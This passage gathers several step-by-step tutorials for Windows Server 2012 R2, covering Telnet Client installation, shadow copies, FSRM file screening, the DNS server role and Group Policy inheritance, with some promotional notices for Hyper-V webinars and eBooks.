Clicking on Next brings you to the Server Roles screen. As there is nothing to be done here, click on Next to continue to the Features screen. Now scroll down the Features list until you arrive at Telnet Client. Tick the box in front of the Telnet Client entry to select it, then click on Next to continue:

 windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-05

Figure 5. Selecting the Telnet client for installation

The following screen asks you to Confirm Installation Selections. Click the Restart the destination server automatically if required tick box and click on Yes to confirm the automatic restart without notifications. Finally, click on Install to start the installation of the Telnet Client:

 windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-06

Figure 6. Final confirmation and initiation of the Windows Telnet Client installation

Once completed, the Results screen will inform you of the success or failure of the process:

 windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-07

Figure 7. Successful installation of Windows Server Telnet Client

Click on Close to end the installation and return to the Server Manager screen.


Installing Telnet Client From The Command Prompt

You need to invoke the Command Prompt window as an Administrator. To do this, right-click on the Windows Start icon located in the lower left corner of the desktop taskbar, then click on Command Prompt (Admin) and click on Yes to the User Account Control query that opens up.

 windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-08

Figure 8. Launching a Command Prompt with Administrator privileges

 Once the Administrator: Command Prompt window opens, type the following command and press Enter:

C:\Windows\system32>dism /online /Enable-Feature /FeatureName:TelnetClient

 windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-09

Figure 9. Installing Telnet Client via Elevated Command Prompt

The command will display real-time progress within the command prompt window and inform you once the Telnet Client has been successfully installed.
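
If you want to double-check the result, DISM can also report the current state of the feature:

C:\Windows\system32>dism /online /Get-FeatureInfo /FeatureName:TelnetClient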

To exit the command prompt window, simply click on the X button (top right corner) or type Exit and press Enter.

Note: It is possible to also install Windows Telnet Client on Windows 8 & Windows 8.1 using the same commands at the Command Line Prompt or PowerShell interface.

Installing Telnet Client From PowerShell

You need to invoke the PowerShell with elevated permissions, i.e., run as Administrator. For this, right click on the third icon from the left on the bottom taskbar on the desktop of the Windows Server 2012 R2:

 windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-010

Figure 10. Running PowerShell with Administrator privileges

Click on Run as Administrator and click on Yes to the User Account Control query that opens up.

Within the PowerShell window, type the following two commands, pressing Enter after each one:

PS C:\Windows\system32> Import-Module servermanager
PS C:\Windows\system32> Add-WindowsFeature telnet-client

 windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-011

Figure 11. Installing Telnet Client via PowerShell On Windows 2012 R2 Server

Windows PowerShell will commence installing Telnet Client and will inform you if the Telnet Client has been successfully installed and whether the server needs a restart.

Type Exit and press Enter to close the Windows PowerShell window.
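
Once installed, the Telnet Client can be used to quickly test connectivity to remote services. As a simple example (the host name below is just a placeholder), the following command attempts to open a connection to an SMTP server on TCP port 25:

C:\> telnet mail.example.com 25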

This article showed how to install the Telnet Client on Windows Server 2012 R2 using the Windows GUI Interface, Elevated Command prompt and Windows PowerShell. For more exciting articles on Windows 2012 R2 server, visit our Windows 2012 Section.


How to Enable & Configure Shadow Copy for Shared Folders on Windows Server 2012 R2

When you shadow copy a disk volume, you are actually generating a snapshot of the changes made to the folders and files within the disk volume at a certain point in time. Windows 2012 R2 shadow copy feature allows taking snapshots at set intervals, so that users can revert and restore their folders and files to a previous version.

The shadow copy feature for backups is a much faster solution compared to the traditional backup solution. We should keep in mind that shadow copy is not meant as a replacement for the traditional backup process. The shadow copy process never copies all the files and folders, but only keeps track of the changes made to them. This is the reason shadow copy cannot replace the traditional backup process. Typically, shadow copies are useful in scenarios where one needs to restore an earlier version of files or folders.

To configure shadow copy of a shared folder in Windows Server 2012, you first have to enable the shadow copy feature on the disk volume containing the shared folder. The shadow copy process works only at the volume level and not on individual files or directories. Additionally, it works only on NTFS volumes and not on FAT volumes. After generating a snapshot of the data, the server keeps track of the changes occurring to the data.

Typically, the server stores the changes on the same volume as the original, but you can change the destination. Additionally, you can define the disk space allocated to shadow copies. As the allocated disk space fills up, the server deletes the oldest shadow copy snapshot, thereby making room for newer shadow copies. Once the server has deleted a shadow copy snapshot, you cannot retrieve it. Windows Server 2012 R2 can keep a maximum of 64 shadow copies per volume.


Install File & Storage Services

The shadow copy feature requires prior installation of all the File and Storage Services. For installing or verifying the installation of all the File and Storage Services, logon to the server as a local administrator, go to the Server Manager Dashboard and click on Add Roles and Features.

windows-2012-shadow-copy-setup-generate-file-folder-01

Figure 1. Server Manager Dashboard

This opens the Add Roles and Features Wizard; go to Server Selection and select the server on which you want to install the File and Storage Services:

windows-2012-shadow-copy-setup-generate-file-folder-02

Figure 2. Selecting our Windows 2012 R2 Server from the server pool

Click on Next and select Server Roles. Expand the File and Storage Services and the File and iSCSI Services. Check that tick marks are visible against all the services. Click on those missing the tick marks:

windows-2012-shadow-copy-setup-generate-file-folder-03

Figure 3. Selecting File & Storage Services, plus iSCSI Services for installation

Click Next four times until you arrive at Confirmation:

windows-2012-shadow-copy-setup-generate-file-folder-04

Figure 4. Add roles and Features – Final confirmation Window

Click on Install to enable all the File and Storage Services. Once the server has completed the installation, click on Close.

Enabling The Shadow Copy Feature

After having confirmed that the server has enabled all File and Storage Services, go to the server desktop and open the File Explorer. You can do this by pressing the WINDOWS+E keys together on your keyboard or by clicking on the fourth icon from left on the bottom toolbar on the Windows Server 2012 R2 desktop:

windows-2012-shadow-copy-setup-generate-file-folder-05 

Figure 5. Opening Windows File Explorer

We will enable shadow copy for the volume C:\. Within this volume, we have our folder C:\Users\Chris_Partsenidis_Share for which we would like to ensure shadow copy is enabled:

windows-2012-shadow-copy-setup-generate-file-folder-06

Figure 6. Location of the folder we will be using as a Shadow-Copy example

Right-click on the Local Disk or volume C:\ (Or any other volume depending on your requirements) and select Configure shadow copies from the drop-down menu:

windows-2012-shadow-copy-setup-generate-file-folder-07

Figure 7. How to enable Shadow Copy for a Windows Volume

When the UAC confirmation dialog box opens, confirm with Yes. This opens the screen for Shadow Copies. Under Select a volume, click to select the volume C:\ from the list or any other volume for which you want to turn on shadow copies. Now, click on Enable.

A confirmation dialog will appear to Enable Shadow Copies along with a warning about file servers with high I/O loads:

windows-2012-shadow-copy-setup-generate-file-folder-08

Figure 8. Enable Shadow Copy confirmation window

Click on Yes to complete the process. You will be returned to the Shadow Copies screen and under Shadow copies of the selected volume, you can see the newly created Shadow Copy for volume C:\:

windows-2012-shadow-copy-setup-generate-file-folder-09 

Figure 9. Viewing the status of Shadow Copy for our Volume

Click on Settings to open the Settings dialog. In the Settings dialog, under Maximum size, you can select either No limit for the space reserved or set a limit for it by selecting Use limit. Note that as stated in the dialog box, a minimum limit of 300MB is necessary for the space reserved for shadow copies:

windows-2012-shadow-copy-setup-generate-file-folder-10 

Figure 10. Setting the maximum size to be used by Shadow Copy for our volume

Next, you can either go with the default schedule of two snapshots of shadow copies every day, or define your own by clicking on Schedule to open the Schedule dialog:

windows-2012-shadow-copy-setup-generate-file-folder-11

Figure 11. Configuring the Shadow Copy Schedule

In the Schedule dialog, tweak the settings to fit your environment in the best possible way and click on Ok to return to the Shadow Copies dialog.

To create a current snapshot, click on Create Now and under Shadow Copies of Selected Volume, a date and time entry will appear, signifying that the server has created a shadow copy snapshot. Click on Ok to close the dialog.
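
For reference, snapshots can also be created and listed from an elevated command prompt with the built-in vssadmin tool. A quick sketch; on Windows Server editions the create shadow option is available:

C:\> vssadmin create shadow /for=C:
C:\> vssadmin list shadows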

Accessing Shadow Copies

Users can access the shared volume/folders from either their local server or from a client PC over the network. They can see the previous versions (shadow copies) of their folders and files from the Properties of the shared folder or file.

Go to File explorer and click on a shared volume - volume C:\ in our case. Select the shared folder within the shared volume – which, in our example, is C:\Users\Chris_Partsenidis. Right-click on the shared folder and go to Restore previous versions:

windows-2012-shadow-copy-setup-generate-file-folder-12

Figure 12. Viewing the Shadow Copy status of our shared folder

This opens the Properties dialog for the shared folder - C:\Users\Chris_Partsenidis. The list under Folder versions contains all the shadow copies created for the shared folder. From this list, you can select a specific previous version (shadow copy) and choose to Open, Copy or Restore it.

windows-2012-shadow-copy-setup-generate-file-folder-13

Figure 13. Accessing previous versions of our shared folder

After you have completed your work, click on Ok or Cancel to exit the dialog box.

This article explained the purpose of the Windows Shadow Copy service and how to enable and configure Shadow Copy for a Windows volume. We also saw how administrators and users can access previous versions of folders/files located in a shadow-copy enabled volume.


Windows Server 2012 File Server Resource Manager (FSRM) Installation & Configuration - Block Saving Of Specific File Types on Windows Server

Windows Server 2008 was the first to include FSRM, or File Server Resource Manager, which allowed administrators to define the file types that users could save to file servers. FSRM has been part of all succeeding Windows Server releases, and administrators can block defined file types from being uploaded to a specific folder or to an entire volume on the server.

Before you can begin blocking file extensions, you may need to install and configure FSRM on your Windows Server 2012 R2. Installation of FSRM can be achieved through the Server Manager GUI or by using the PowerShell console.

This article will examine the installation of FSRM using both methods, Server Manager GUI and Windows Server PowerShell console, while providing all necessary information to ensure a successful deployment and configuration of FSRM services.


Installing FSRM On Server 2012 Using The Server Manager GUI

Assuming you are logged in as the administrator, start with the Server Manager – click on the second icon from left on the bottom toolbar on the desktop as shown below:

windows-2012-fsrm-installation-configuration-block-defined-file-types-1

Figure 1. Launching the Server Manager Dashboard

This brings up the Server Manager Dashboard. Proceed to the top right hand corner and click on Manage, then click on Add Roles and Features.

windows-2012-fsrm-installation-configuration-block-defined-file-types-2
Figure 2. Opening Add Roles and Features console

This opens the Add Roles and Features Wizard, where you need to click on Server Selection. Depending on how many servers you are currently managing, the right hand side will show one or multiple servers in the pool. Select the file server on which you want to install FSRM, and click on Next to proceed.

 windows-2012-fsrm-installation-configuration-block-defined-file-types-3

Figure 3. Selecting a Server to add the FSRM role

The next screen shows the server roles that you can install on the selected server. On the right hand side, locate File and Storage Services and expand it. Locate the File and iSCSI services and expand it. Now, locate the File Server Resource Manager entry.

 windows-2012-fsrm-installation-configuration-block-defined-file-types-4
Figure 4. Selecting the File Server Resource Manager role for installation

Click on the check box in front of the entry File Server Resource Manager. This will open up the confirmation dialog box for the additional features that you must first install before installing FSRM.

windows-2012-fsrm-installation-configuration-block-defined-file-types-5 
Figure 5. Confirming the installation of additional role services required for FSRM

Click on Add Features and you are all set to install FSRM, as the check box for File Server Resource Manager now has a tick mark (shown below).

windows-2012-fsrm-installation-configuration-block-defined-file-types-6

Figure 6. Back to the Server Role installation – Confirming FSRM Role Selection

Clicking on Next allows you to Select one or more features to install on the selected server. We don’t need to add anything here at this stage, so click Next to go to the next step.

This brings up a screen asking you to Confirm installation selections. This is the stage where you have the last chance to go back and make any changes, before the actual installation starts.

windows-2012-fsrm-installation-configuration-block-defined-file-types-7 
Figure 7. Confirm installation selections

Click on Install to allow the installation to commence and show the progress on the progress bar on the Results screen. Once completed, you can see the Installation successful on … under the progress bar.

windows-2012-fsrm-installation-configuration-block-defined-file-types-8 
Figure 8. Completion of FSRM role installation

Click on Close to exit the process.

To check if the FSRM has actually started running, go to the Server Manager Dashboard and click on File and Storage Services on the left hand side of the screen.

windows-2012-fsrm-installation-configuration-block-defined-file-types-9 
Figure 9. Server Manager Dashboard

The Dashboard now shows all the servers running under the File and Storage Services. Go down to Services and you will see FSRM running with an automatic start up.

 windows-2012-fsrm-installation-configuration-block-defined-file-types-10

Figure 10. File and Storage Services – Confirming FSRM Service

Installing FSRM On Server 2012 Using The PowerShell Console

This is an easier and faster process than the GUI method.

To invoke the PowerShell, click the third icon from left on the bottom toolbar on the desktop.

windows-2012-fsrm-installation-configuration-block-defined-file-types-11 
Figure 11. Launching Windows PowerShell

 This will open up a console with an administrative level command prompt. At the command prompt, type:

C:\Users\Administrator> Add-WindowsFeature -Name FS-Resource-Manager -IncludeManagementTools

windows-2012-fsrm-installation-configuration-block-defined-file-types-12

Figure 12.  Executing PowerShell command to install FSRM

A successful installation will be indicated as True under the Success column, as shown above.
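
You can optionally verify the result with Get-WindowsFeature, which should list the role service with an Install State of Installed:

PS C:\Users\Administrator> Get-WindowsFeature FS-Resource-Manager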


Configuring File Screening

Invoke FSRM from the Tools menu on the top right hand corner of the Server Manager Dashboard.

 windows-2012-fsrm-installation-configuration-block-defined-file-types-13

Figure 13. Running the File Server Resource Manager component

The File Server Resource Manager screen opens up. On the left panel, expand the File Screening Management and go to File Groups. The central panel shows the File Groups, the Include Files and the Exclude Files in three columns.

Under the column File Groups, you will find file types conveniently grouped together. The column Include Files lists all file extensions that are included in the specific file group. For a new server, the column Exclude Files is typically empty.

 windows-2012-fsrm-installation-configuration-block-defined-file-types-14

Figure 14 – File Groups, Include File and Exclude Files

On the left panel, go to File Screen Templates and click on it. The central panel shows predefined rules that apply to folders or volumes.

 windows-2012-fsrm-installation-configuration-block-defined-file-types-15

Figure 15. File Server Resource Manager - File Screen Templates

For instance, double-click on Block Image Files in the central panel. This opens up the File Screen Template Properties for Block Image Files. Here you can define all the actions that the server will take when it encounters a situation where a user is trying to save a file belonging to the excluded group.

 windows-2012-fsrm-installation-configuration-block-defined-file-types-16

Figure 16. FSRM - File Screen Template Properties for Block Image Files

You can choose to screen the specified file type either actively or passively. Active screening disallows users from saving the specified file group. With passive screening, users are not prevented from saving the files while the administrator can monitor their actions.

The server can send from one to four basic alerts when it encounters an attempt to save a forbidden file. The server can send an email message to the administrator, create an entry in the Event Log, run a specified command or script, and/or generate a report. You can set up the details for each action on the individual tabs. When completed, exit by clicking on OK or Cancel.

To edit the existing template or to create a new one based on the chosen template, go to the File Screen Templates and in the central panel, right-click on the predefined template you would like to edit. From the Actions menu on the right panel, you can either Create File Screen Template or Edit Template Properties.

windows-2012-fsrm-installation-configuration-block-defined-file-types-17 
Figure 17. FSRM – Creating or editing a File Screen Template

Clicking on Create File Screen Template opens up a dialog where you can click on Browse to select a folder or volume on which the new rule will be applied. Under How do you want to configure file screen properties?, you can either derive the properties from an existing template or create custom ones. Click on Create to allow the new file screen rule to appear in the central panel.

 windows-2012-fsrm-installation-configuration-block-defined-file-types-18

Figure 18. FSRM - Creating a File Screen
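
The same kind of file screen can also be created from PowerShell using the FileServerResourceManager cmdlets installed with the FSRM role. A minimal sketch; the path below is hypothetical and the template name matches the built-in Block Image Files template:

# Create a file screen on a folder using a built-in template (hypothetical path)
New-FsrmFileScreen -Path "D:\Shares\Users" -Template "Block Image Files"

# List the file screens currently defined on the server
Get-FsrmFileScreen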

Creating Exceptions

Exceptions are useful when you want to allow a blocked file type to be saved in a specific location. Go to the left panel of the FSRM screen and right-click on File Screens.

windows-2012-fsrm-installation-configuration-block-defined-file-types-19

Figure 19. FSRM – Creating a File Screen Exception

From the menu on the right panel, click on Create File Screen Exception. In the dialog that opens, click on Browse to select the folder or volume to which the new rule will apply, and under File groups select the group you would like to exclude from screening. Click OK to complete the process.

 windows-2012-fsrm-installation-configuration-block-defined-file-types-20

Figure 20. FSRM – File Screen Exception settings and options

Summary

This article showed how we can use the Windows Server File Server Resource Manager (FSRM) to block file types and extensions from being uploaded or saved to a directory or volume on a Windows 2012 R2 server. We explained how to install FSRM via the GUI and PowerShell, and covered the creation and editing of File Screen Templates used to block or permit the saving of specific files.


New Upcoming Features in Hyper-V vNext - Free Training From Leading Hyper-V Experts – Limited Seats!

With the release of Hyper-V vNext just around the corner, Altaro has organized a Free webinar that will take you right into the new Hyper-V vNext release. Microsoft Hyper-V MVP, Aidan Finn and Microsoft Sr. Technical Evangelist Rick Claus will take you through the new features, improvements, changes and much more, and will be available to answer any questions you might have.

Don't lose this opportunity to stay ahead of the rest, learn about the new Hyper-V vNext features and have your questions answered by Microsoft Hyper-V experts!

Note: This webinar date has passed, however the recording and all material presented are freely available via the registration link below:

Click here to view this Free Webinar.

windows-virtualization-hyper-v-vnext-features-webinar-1


Free Webinar & eBook on Microsoft Licensing for Virtual Environments (Hyper-V)

Microsoft Licensing for Virtual environments can become a very complicated topic, especially with all the misconceptions and false information out there. Thankfully Altaro, the leader in Hyper-V Backup solutions, has gathered Hyper-V MVP experts Thomas Maurer and Andrew Syrewicze to walk us through the theory and present us with real licensing scenarios to help us gain a solid understanding of Microsoft licensing in virtual environments.

Their Hyper-V experts will also be available to answer all questions presented during the free webinar. Registration and participation for this webinar is completely free.

Webinar Details: This webinar has passed, however a recorded version is available at the URL below, along with all necessary resources.

As a bonus, a free eBook written by Hyper-V expert Eric Siron, covering Licensing Microsoft Server in a Virtual Environment, is now available as a free download.

To download your free eBook copy and register for the Free Webinar click here.

 


Free Hyper-V eBook - Create, Manage and Troubleshoot Your Hyper-V VMs. Free PowerShell Scripts Included!

With the introduction of Hyper-V on the Windows Server platform, virtualization has quickly become the de facto standard for all companies seeking to consolidate their server infrastructure. While we've covered a number of virtualization topics, including Hyper-V installation, Management-Configuration, Hyper-V Backups, Best Practices and much more, this e-Book offered by Altaro is all about getting the most out of your Hyper-V infrastructure.

The Altaro PowerShell Hyper-V Cookbook, written by Jeffery Hicks, a well-known PowerShell MVP, covers a number of very important topics that are guaranteed to help you discover more about your Hyper-V server(s) and make the most of what they can offer.

Topics covered include:

  • Hyper-V Cmdlets - Understand what they are, how to use them and create a Hyper-V virtual machine
  • Discover and display information about your VMs and Hyper-V host
  • Easily Identify VHD/VHDX files
  • Mount ISO files
  • Delete obsolete snapshots and query Hyper-V event logs
  • and much more!

 Don't miss this opportunity and grab your free copy for a limited time!

 BONUS: All PowerShell scripts are included FREE in a separate ZIP file!


How to Install and Configure Windows 2012 DNS Server Role

Our previous article covered an introduction to the Domain Name System (DNS) and explained the importance of the DNS Server role within the network infrastructure, especially when Active Directory is involved. This article covers the installation of the DNS server role in Windows Server 2012 and includes all the necessary information for the successful deployment and configuration of the DNS service. Interested users can also read our DNS articles covering the Linux operating system or our analysis of the DNS protocol in the Network Protocols section.

The DNS Server can be installed during the deployment of Active Directory Services or as a stand-alone service on any Windows server. We'll be covering both options in this article.


DNS Server Installation via Active Directory Services Deployment

Administrators who are in the process of deploying Active Directory Services will be prompted to install the DNS server role during the AD installation process, as shown in figure 1 below:

Figure 1. DNS Installation via Active Directory Services Deployment

Alternatively, administrators can choose to install the DNS server role later on, or even on a different server, as shown next. We decided to install the DNS Server role on the Active Directory Domain Controller server.

DNS Server Installation on Domain Controller or Stand Alone Server

To begin the installation, open Server Manager and click Add Roles and Features. Click Next on the Before you begin page. Now choose Role-based or feature-based installation and click Next:

Figure 2. Selecting Role-based or feature-based installation

In the next screen, choose the Select a server from this server pool option and select the server for which the DNS server role is intended. Once selected, click the Next button as shown in figure 3:

Figure 3. Selecting the Server that will host the DNS server role

 The next screen allows us to choose the role(s) that will be installed. Select the DNS server role from the list and click Next to continue:

Figure 4. Selecting the DNS Server Role for installation

The next screen is the Features page, where you can safely click Next without selecting any feature from the list.

The next screen provides information on the DNS Server role that's about to be installed. Read the DNS Server information and click Next:

Figure 5. DNS Information

The final screen is a confirmation of the roles and services to be installed. When ready, click on the Install button for the installation to begin:

Figure 6. Confirm Installation Selections

The Wizard will provide an update on the installation progress as shown below. Once the installation has completed, click the Close button:

Figure 7. Installation Progress
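
As a side note, the same role can also be installed from an elevated PowerShell console with a single command; the -IncludeManagementTools switch adds the DNS Manager console:

PS C:\> Install-WindowsFeature DNS -IncludeManagementTools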

 


Configuring Properties of DNS Server

Upon successful installation of the DNS Server role, you can open the DNS Manager to configure the DNS Server. Once DNS Manager is open, expand the server; in our example the server is FW-DC1. Right below the server we can see the Forward Lookup Zones and Reverse Lookup Zones listed. Because this is an Active Directory-integrated DNS server, the firewall.local and _msdcs.firewall.local zones are created by default, as shown in figure 8:

Figure 8. DNS Manager & DNS Zones

To configure the DNS server properties, right-click the DNS server and click Properties. Next, select the Forwarders tab. Click Edit and add the IP address of the DNS server that this server will query when it is unable to resolve a name itself. This is usually the ISP's DNS server or any public DNS server such as Google's 8.8.8.8 or Level 3's 4.2.2.2. There is another feature called root hints which does a similar job (it queries the Internet's root DNS servers), but we prefer using forwarders alongside public DNS servers:

Figure 9. DNS Forwarders – Add your ISP or Public DNS Servers here
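
The same forwarders can be configured from PowerShell using the DnsServer module. A quick sketch using the public DNS addresses mentioned above:

PS C:\> Add-DnsServerForwarder -IPAddress 8.8.8.8, 4.2.2.2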

Next, click on the Advanced tab. Here you can configure advanced features such as round robin (in case of multiple DNS servers), scavenging period and so on. Scavenging is a feature often used as it deletes the stale or inactive DNS records after the configured period, set to 7 days in our example:

Figure 10. Advanced Options - Scavenging

Next up is the Root Hints tab. Here you will see a list of the 13 root servers. These servers are queried when our DNS server is unable to resolve a DNS request for its clients and no DNS forwarding is configured. As we can see, DNS forwarding is an optional but recommended configuration. It is highly unlikely administrators will ever need to change the Root Hints servers:

Figure 11. Root Hints

Our next tab, Monitoring, is also worth exploring. Here you can perform a DNS lookup test that will run queries against your newly installed DNS server. You can also configure an automated test that will run at a configured time interval to ensure the DNS server is operating correctly:

Figure 12. Monitoring Tab – Configuring Automated DNS Test Queries
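
Outside the Monitoring tab, a quick manual test can also be run from PowerShell by pointing a query at the new DNS server; the host name below is just an example and FW-DC1 is our DNS server:

PS C:\> Resolve-DnsName www.firewall.cx -Server FW-DC1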

Next, click on the Event Logging tab. Here you can configure options to log DNS events. By default, all events are logged, but you can configure the server to log only errors, only warnings, a combination of errors and warnings, or turn logging off (No events option):

Figure 13. Event Logging

When Event Logging is enabled, you can view any type of logged events in the Event Viewer (Administrative Tools) console.

The Debug Logging tab is next up. Debug Logging allows us to capture to a log file any packets sent and received by the DNS server. Think of it as Wireshark for your DNS server. You can log DNS packets and filter them by direction, protocol, IP address, and other parameters as shown below. You can also set the log file location and the maximum file size in bytes:

Figure 14. Debug Logging – Capturing DNS Packets & Configuring DNS Debugging

Zone – Domain Properties

Each zone or domain has a specific set of properties which can be configured as shown in figure 15 below. In our example, firewall.local is an Active Directory-integrated zone, as indicated by the Type field. Furthermore, the zone's status is shown at the top of the window; our zone is currently in the running state and can be paused by simply clicking on the Pause button on the right:

Figure 15. Zone Properties

Right below, you can change the zone type to primary, secondary or stub. You can also set dynamic updates to be secure or not. Similarly, you can set the aging and scavenging properties to automate the cleanup of stale records.

The Start of Authority (SOA) tab provides access to a number of important settings for our DNS server. Here you can view the serial number, which increments automatically every time there is a change in the DNS zone. The serial number is used by other DNS servers to identify whether any changes have been made since the last time they replicated the zone. The Primary server field indicates which server is the primary server hosting the zone or domain. In case there are multiple DNS servers in the network, we can easily select a different server from here:

Figure 16. Start Of Authority Settings

In addition, you can also configure the TTL (Time to Live) value, refresh, retry intervals and expiry time of the record.

Next is the Name Servers tab. In this tab, you can add the list of name servers that are authoritative for this zone:

Figure 17. DNS Name Servers

Finally, the Zone Transfers tab. In this tab, you can add DNS servers which can copy zone information (zone transfer) from this DNS server:

Figure 18. Zone Transfers

Once all configuration changes have been completed, click Apply and your zone is good to go.


This article showed how to install and configure Windows 2012 DNS Server Role and explained all DNS Server options available for configuration.


Introduction to Windows DNS – The Importance of DNS for Active Directory Services

The Domain Name System (DNS) is perhaps one of the most important services for Active Directory. DNS provides name resolution services for Active Directory, resolving hostnames, URLs and Fully Qualified Domain Names (FQDN) into IP addresses. The DNS service uses UDP port 53, and TCP port 53 for zone transfers and for responses that are too large to fit in a UDP datagram.

In-Depth information and analysis of the DNS protocol structure can be found at our DNS Protocol Analysis article.


How DNS Resolution Works

When installed on a Windows Server, DNS uses a database stored in Active Directory or in a file and contains lists of domain names and corresponding IP addresses. When a client requests a website by typing a domain (URL) inside the web browser, the very first thing the browser does is to resolve the domain to an IP address.

To resolve the IP address, the browser checks various places. First, it checks the local cache of the computer; if there is no entry for the domain in question, it then checks the local hosts file (C:\windows\system32\drivers\etc\hosts), and if no record is found there either, it finally queries the DNS server.

The DNS server returns the IP address to the client and the browser forms the http request which is sent to the destination web server.

The above series of events describes a typical HTTP request to a site on the Internet. The same series of events is usually followed when requesting access to resources within the local network and Active Directory, the only difference being that the local DNS server is aware of all internal hosts and domains.
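
The local resolver cache mentioned above can be inspected and cleared from a command prompt, which is handy when troubleshooting or testing DNS changes:

C:\> ipconfig /displaydns
C:\> ipconfig /flushdns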

A DNS server can be configured on any server running the Windows Server 2012 operating system. The DNS server can be Active Directory-integrated or not. A few important tasks a DNS server in Windows Server 2012 is used for are:

  • Resolve host names to their corresponding IP addresses (DNS)
  • Resolve IP addresses to their corresponding host names (Reverse DNS)
  • Locate Global Catalog Servers and Domain Controllers
  • Locate Mail Servers

DNS Zones & Records

A DNS server contains Forward Lookup Zones and Reverse Lookup Zones. Each zone contains different types of resource records. A Forward Lookup Zone maps host names to IP addresses, while a Reverse Lookup Zone maps IP addresses back to host names. A DNS zone is stored either in a file or in the Active Directory database. When the zone is stored in a file, only the primary copy of the zone is writable and any secondary copies are read-only; when the zone is stored in the Active Directory database, every domain controller hosting the zone holds a writable copy. Resource records specify the type of resource.

Resource records in Forward Lookup Zone include:

  • Host Name (A)
  • Mail Exchange (MX)
  • Service (SRV)
  • Start of Authority (SOA)
  • Alias (CNAME)
  • Name Server (NS)

Table 1. Resource Record Types

Similarly, resource records in Reverse Lookup Zone include:

  • Pointer (PTR)
  • Start of Authority (SOA)
  • Name Server (NS)

Table 2. Reverse Lookup Zone Resource Record Types
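
On a Windows Server 2012 DNS server, records of these types can also be created from PowerShell with the DnsServer module. A small sketch using example names and addresses:

# Add an A record to a forward lookup zone (example host name and address)
Add-DnsServerResourceRecordA -ZoneName "firewall.local" -Name "fileserver1" -IPv4Address "192.168.1.50"

# Add the matching PTR record (assumes the reverse lookup zone already exists)
Add-DnsServerResourceRecordPtr -ZoneName "1.168.192.in-addr.arpa" -Name "50" -PtrDomainName "fileserver1.firewall.local"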


Types Of DNS Zone

There are four DNS zone types:

Primary Zones: This is a Master DNS Server for a zone and stores the master copy of zone data in AD DS or in a local file. This zone is the primary source for information about this zone.

Secondary Zones: This is a Secondary DNS Server for a zone and stores a read-only copy of the zone data in a local file. Secondary Zones cannot be stored in AD DS. The server that hosts a Secondary Zone retrieves the DNS information from another DNS server where the original zone is hosted, and must have network access to that remote DNS server.

Stub Zones: A Stub Zone contains only those resource records that are required to identify the authoritative DNS servers of that zone. A Stub Zone contains only SOA, NS and A type resource records which are required to identify the authoritative name server.

Active Directory-Integrated Zones: An Active Directory-Integrated Zone stores zone data in Active Directory. The DNS server can use the Active Directory replication model to replicate DNS changes between Domain Controllers, which allows for multiple writable copies of the zone across the Domain Controllers in the network. Similarly, secure dynamic updates are supported, which means that computers that have joined the domain can register and update their own DNS records on the DNS server.

This article provided information about DNS services and a brief description of the DNS resolution process. We also explained the importance of DNS services in Active Directory and reviewed the four different types of DNS zones. The next article will show how to install the DNS Server role in Windows Server 2012.


Windows Server Group Policy Link Enforcement, Inheritance and Block Inheritance

Our previous article explained what Group Policy Objects (GPO) are and showed how group policies can be configured to help control computers and users within an Active Directory domain. This article takes a look at Group Policy Enforcement, Inheritance and Block Inheritance throughout our Active Directory structure. Users seeking more technical articles on Windows 2012 Server can visit our dedicated Windows 2012 Server section.

Group Policy Enforcement, Inheritance and Block Inheritance provide administrators with the flexibility needed for a successful Group Policy deployment within Active Directory, especially in large organizations where multiple GPOs are applied at different levels of the Active Directory and some GPOs may accidentally override others.

Thankfully, Active Directory provides a simple way to gain granular control of GPOs.

 


 

Group Policy Object Inheritance

GPOs can be linked at the Site, Domain, OU and child OU levels. By default, group policy settings that are linked to parent objects are inherited by the child objects in the Active Directory hierarchy. For example, the Default Domain Policy is linked to the domain by default and is inherited by all child objects of the domain hierarchy.

GPO inheritance lets administrators set a common set of policies at the domain or site level and configure more specific policies at the OU level. GPOs inherited from parent objects are processed before GPOs linked to the object itself.

 

As shown in the figure below, the Default Domain Policy GPO with precedence 2 will be processed first, because the Default Domain Policy is applied at the domain level (firewall.local), whereas the WallPaper GPO is applied at the organizational unit level:

Figure 1. Group Policy Inheritance

Block Inheritance

While GPOs are inherited by default, inheritance can also be blocked if required, using the Block Inheritance option. If the Block Inheritance setting is enabled, the inheritance of group policy settings is blocked. This setting is mostly used when an OU contains users or computers that require different settings from those applied at the domain level.


As shown in the figure below, to configure blocking of GPO inheritance, right-click the OU container and select the Block Inheritance option from the list:

         Figure 2. GPO Block Inheritance

Enforced (No Override)

This option prevents a GPO from being overridden by other GPOs. For example, if you apply a GPO to the domain and check the Enforced option, the policy will be enforced on all child objects in Active Directory and takes precedence over GPOs linked at lower levels, even if a child-level GPO configures the same setting with a different value. In previous Windows Server versions, the GPO Enforced option used to be called No Override.

To enable the GPO Enforced option, right-click on a particular GPO and click on the Enforced option:

Figure 3. Enforcing a GPO
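
To check how inheritance, blocking and enforcement combine for a particular container, the GroupPolicy PowerShell module can report the resulting GPO order. A quick sketch; the distinguished name below is an example OU in the firewall.local domain:

PS C:\> Get-GPInheritance -Target "OU=FW Users,DC=firewall,DC=local"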

This article explained the importance of GPO inheritance and how it can be enforced or blocked via Group Policy Enforcement, Inheritance and Block Inheritance throughout the Active Directory. For more information on Group Policies and how they are created or applied, refer to our article Configuring Windows 2012 Active Directory Group Policies or visit our Windows 2012 Server Section.




Understanding, Creating, Configuring & Applying Windows Server 2012 Active Directory Group Policies

This article explains what Group Policies are and shows how to configure Windows Server 2012 Active Directory Group Policies. Our next article will cover how to properly enforce Group Policies (Group Policy Link Enforcement, Inheritance and Block Inheritance) on computers and users that are part of the company's Active Directory.


Before we dive into Group Policy configuration, let's explain what exactly Group Policies are and how they can help an administrator control its users and computers.

A Group Policy is a computer or user setting that can be configured by administrators to apply various computer specific or user specific registry settings to computers that have joined the domain (active directory). A simple example of a group policy is the user password expiration policy which forces users to change their password on a regular basis. Another example of a group policy would be the enforcement of a specific desktop background picture on every workstation or restricting users from accessing their Local Network Connection properties so they cannot change their IP address.

A Group Policy Object (GPO) contains one or more group policy settings that can be applied to domain computers, users, or both. GPO objects are stored in active directory. You can open and configure GPO objects by using the GPMC (Group Policy Management Console) in Windows Server 2012:

Figure 1. GPO Objects

